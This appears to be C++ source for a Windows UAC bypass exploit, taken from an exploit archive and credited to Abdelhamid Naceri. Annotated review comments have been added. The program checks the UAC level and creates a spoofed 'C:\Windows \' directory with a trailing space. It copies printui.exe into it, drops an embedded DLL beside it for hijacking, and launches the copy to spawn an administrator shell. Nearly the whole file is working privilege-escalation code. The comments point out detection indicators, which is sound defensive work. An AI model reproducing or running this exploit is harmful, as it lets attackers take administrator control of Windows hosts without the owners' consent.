## https://sploitus.com/exploit?id=1337DAY-ID-33357
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include "resource.h"
#include <winres.h>
#include <string>
#include <tchar.h>
// Level codes returned by CheckUac(): err = values unreadable or not a
// recognised combination, dis = UAC off, def = default prompt level,
// max = "always notify" (the level the program refuses to continue at).
#define err -1
#define dis 0
#define def 1
// NOTE(review): windows.h normally provides a function-like max(a, b) macro;
// redefining it as an object-like macro here will usually draw a
// macro-redefinition warning — confirm NOMINMAX or accept the warning.
#define max 2
// Generic buffer length in bytes.
#define BUFFER 8192
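/*
 * Read one REG_DWORD value under the UAC policy key
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
 *
 * name: value name (e.g. L"EnableLUA").
 * out:  receives the DWORD on success; untouched on failure.
 * Returns 1 when RegGetValue reports ERROR_SUCCESS (0), else 0.
 */
static int read_uac_policy_dword(const wchar_t *name, DWORD *out) {
    /* Pass the real size of the target: the old code handed RegGetValue a
     * length of BUFFER (8192) for a 4-byte object. RRF_RT_REG_DWORD restricts
     * the accepted value type, so at most sizeof *out bytes are written. */
    DWORD size = sizeof *out;
    return RegGetValue(HKEY_LOCAL_MACHINE,
                       L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                       name, RRF_RT_REG_DWORD, NULL, out, &size) == 0;
}

/*
 * Map the machine's UAC policy values to one of the file's level codes.
 *
 * Returns def when ConsentPromptBehaviorAdmin == 5 and EnableLUA == 1,
 *         max when ConsentPromptBehaviorAdmin == 2 and EnableLUA == 1,
 *         dis when either value is 0,
 *         err for any other combination, and also when either value cannot
 *             be read. The previous version never checked the RegGetValue
 *             result and compared uninitialized ints when a read failed.
 */
int CheckUac() {
    DWORD consent_admin = 0;
    DWORD enable_lua = 0;

    /* A missing or unreadable value is reported as "unknown", not guessed. */
    if (!read_uac_policy_dword(L"ConsentPromptBehaviorAdmin", &consent_admin) ||
        !read_uac_policy_dword(L"EnableLUA", &enable_lua)) {
        return err;
    }

    if (consent_admin == 5 && enable_lua == 1) {
        return def;
    }
    if (consent_admin == 2 && enable_lua == 1) {
        return max;
    }
    if (consent_admin == 0 || enable_lua == 0) {
        return dis;
    }
    return err;
}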
/*
 * Program entry point (wide-character main).
 *
 * Flow as written: print a banner, read the UAC level through CheckUac() and
 * stop unless it reports the default level, then create a directory whose name
 * carries a trailing space, copy printui.exe into it, write the embedded
 * IDR_DLL1 resource beside it, launch the copy, wait 3 s and remove the staged
 * files. Every step is an on-disk or process-creation artifact on the host.
 * None of the Win32 calls below has its return value checked, so a failed step
 * is neither reported nor stops the sequence.
 */
INT wmain() {
// Author : Abdelhamid Naceri
printf("[!] Author : Abdelhamid Naceri \n");
printf("[!] Checking UAC Level ...\n");
// Check first: at the "always notify" level the prompt would appear anyway.
// CheckUac() is invoked again for each branch, so the registry may be read up
// to three times; the result is not cached.
if (CheckUac() == def) {
printf("[+] UAC Is On Default Level ...\n");
}
else if (CheckUac() == max) {
printf("[-] UAC Is On Always Notify Level Cant Continue ...\n");
printf("[-] Exiting ...");
return 0;
}
else if (CheckUac() == dis) {
printf("[+] UAC Is Disabled This Exploit Is Not Required , Elevate Yourself ...\n");
printf("[+] Exiting ...");
// UAC is disabled: nothing to bypass, leave.
return 0;
}
else{
printf("[+] Something Went Wrong :(\n");
printf("[+] Exiting ...");
// CheckUac() returned err: unreadable or unrecognised registry values.
return 0;
}
printf("[+] Creating Fake Trusted Directory If Do No Exist ...\n");
// Both names end in a space ("Windows ") and use the \\?\ prefix; the second
// argument (security attributes) is 0, i.e. the default ACL. A directory
// named "C:\Windows " (trailing space) existing at all is a reliable indicator
// that this tool ran on the host.
CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
CreateDirectoryW(L"\\\\?\\C:\\Windows \\SysWOW64", 0);
//this "Windows " bypass the uac ANSI character set check
printf("[+] Copying Executable To Fake Trusted Directory ...\n");
// Third argument false: an existing copy at the destination is overwritten.
CopyFileW(L"C:\\Windows\\SysWOW64\\printui.exe", L"\\\\?\\C:\\Windows \\SysWOW64\\printui.exe", false);
printf("[+] Extracting Resources To Fake Trusted Directory ...\n");
// The DLL is embedded in this binary as resource IDR_DLL1 (see resource.h)
// of the custom type "dll"; FindResource/LoadResource results are used
// without a NULL check.
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
DWORD DllSize = SizeofResource(hm, res);
void* dllBuff = LoadResource(hm, res);
// CREATE_ALWAYS truncates any printui.dll already present in the staged
// directory; the handle is not compared with INVALID_HANDLE_VALUE.
HANDLE hDll = CreateFile(L"\\\\?\\C:\\Windows \\SysWOW64\\printui.dll", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
//You Can Find The Full Project https://github.com/klinix5/UAC_Bypass
DWORD sizeout;
// sizeout receives the number of bytes written; it is never compared with
// DllSize, so a short write goes unnoticed.
WriteFile(hDll, dllBuff, DllSize, &sizeout, NULL);
CloseHandle(hDll);
printf("[+] Spawning Administrator Shell ...\n");
// Launches the staged copy; this path has no \\?\ prefix, unlike the
// CreateDirectoryW/CreateFile calls above.
ShellExecute(NULL, _T("open"), _T("C:\\Windows \\SysWOW64\\printui.exe"), NULL, NULL, SW_RESTORE);
printf("[+] PwNeD :) \n");
printf("[+] Cleaning Up Resources ...\n");
// Fixed 3 s delay; nothing waits on the spawned process, so cleanup is
// attempted whether or not it has finished.
Sleep(3000);
DeleteFile(L"C:\\Windows \\SysWOW64\\printui.dll");
DeleteFile(L"C:\\Windows \\SysWOW64\\printui.exe");
// _wrmdir removes only empty directories: if either DeleteFile above failed,
// the staged tree is left behind on disk.
_wrmdir(L"\\\\?\\C:\\Windows \\SysWOW64");
_wrmdir(L"\\\\?\\C:\\Windows ");
printf("[-_-] Exiting ...");
return 0;
}